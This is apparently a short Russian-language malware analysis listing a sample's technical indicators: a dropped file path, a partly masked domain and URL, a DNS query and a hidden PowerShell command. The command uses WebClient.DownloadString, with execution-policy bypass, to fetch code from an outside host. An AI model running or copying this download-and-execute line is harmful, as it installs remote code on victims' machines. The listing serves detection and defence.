Техническая информация
- $wlotzpkfzrlzysmnvahhhnlsbi
- %APPDATA%\divx\p.zip
- 'pr####le-cex-io.com':80
- http://pr####le-cex-io.com/111.php?82####
- DNS ASK pr####le-cex-io.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex Bypass -NoP -C $wLOtzpKFZRlzySMNvAhhHnLSbI='http://profille-cex-io.com/111.php?826803';$YyBicSFzxoKurzfLZudvFneBuztHOfZIS=(New-Object System.Net.WebClient).DownloadString($wLOtzpKFZRlzySMNv...' (со скрытым окном)